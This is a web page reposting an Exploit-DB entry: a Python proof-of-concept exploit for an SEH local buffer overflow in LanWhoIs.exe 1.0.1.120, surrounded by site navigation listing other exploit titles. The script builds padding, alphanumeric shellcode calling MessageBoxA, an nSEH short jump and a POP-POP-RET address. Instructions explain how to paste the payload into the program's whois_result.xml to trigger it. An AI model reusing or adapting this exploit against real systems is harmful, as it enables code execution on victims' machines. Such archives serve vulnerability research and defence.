首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LanWhoIs.exe 1.0.1.120 SEH Local Buffer Overflow
来源:https://www.exploit-db.com 作者:H3ku 发布时间:2016-11-08  
#!/usr/bin/python
# -*- coding: utf-8 -*-
 
### LanWhoIs.exe 1.0.1.120 SEH Local Buffer Overflow Exploit by H3ku ### 
 
# Date: 2016-10-26
# Exploit Author: H3ku
# Exploit Title: LanWhoIs.exe 1.0.1.120 SEH Overflow Exploit
# Vendor Homepage: http://lantricks.com
# Software Link: https://www.exploit-db.com/apps/70189a2b11bf85245ebcc00b603b5def-lanwhois_setup.exe
# Version: 1.0.1.120
# Tested on: Win7 64bit - Win10 64bits
 
# Credits
# =======
# PoC by: hyp3rlinx - http://hyp3rlinx.altervista.org
#   https://www.exploit-db.com/exploits/38404/
# Thanks to n30m1nd for clarifying my doubts in the amazing world of exploiting!
 
# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents in to C:\Program Files (x86)\LanTricks\LanWhoIs\whois_result.xml (Parameter <QueryString>)
# * Select the address in the Results window pane and then click Query button to run a whois lookup or use 'F3'
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
 
# Exploit code
# ============

import struct

# MessageBoxA in 00404A2C
shellcode = ("\x25\x41\x41\x41"
             "\x41\x25\x32\x32"
             "\x32\x32\x50\x68"
             "\x70\x77\x6E\x64"
             "\x54\x5F\x50\x57"
             "\x57\x50\x35\x51"
             "\x7A\x70\x50\x35"
             "\x7D\x30\x30\x50"
             "\x50\xC3")

payload = "A"*550
payload += shellcode
payload += "A"*(126-len(shellcode))
nseh = "\xEB\x80\x90\x90" #jmp $-126
seh = struct.pack("<L", 0x00402b56) #POP ECX - POP EBP - RETN

payload += nseh + seh

with open("exploit.txt", "wb") as f:
    f.write(payload[:-1])
    f.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Server AD LD
·VBScript CRegExp::Execute Unin
·LDAP Amplication Denial Of Ser
·Internet Explorer 8-11, IIS, C
·Microsoft Internet Explorer 10
·Internet Explorer 9 MSHTML - C
·BolinTech DreamFTP 1.02 - 'RET
·Linux Kernel 2.6.x < 2.6.7-rc3
·PCMan FTP Server 2.0.7 - 'PORT
·Solaris 8/9 ps - Environment V
·PCMan FTP Server 2.0.7 - 'SITE
·Solaris 7/8/9 CDE libDtHelp -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved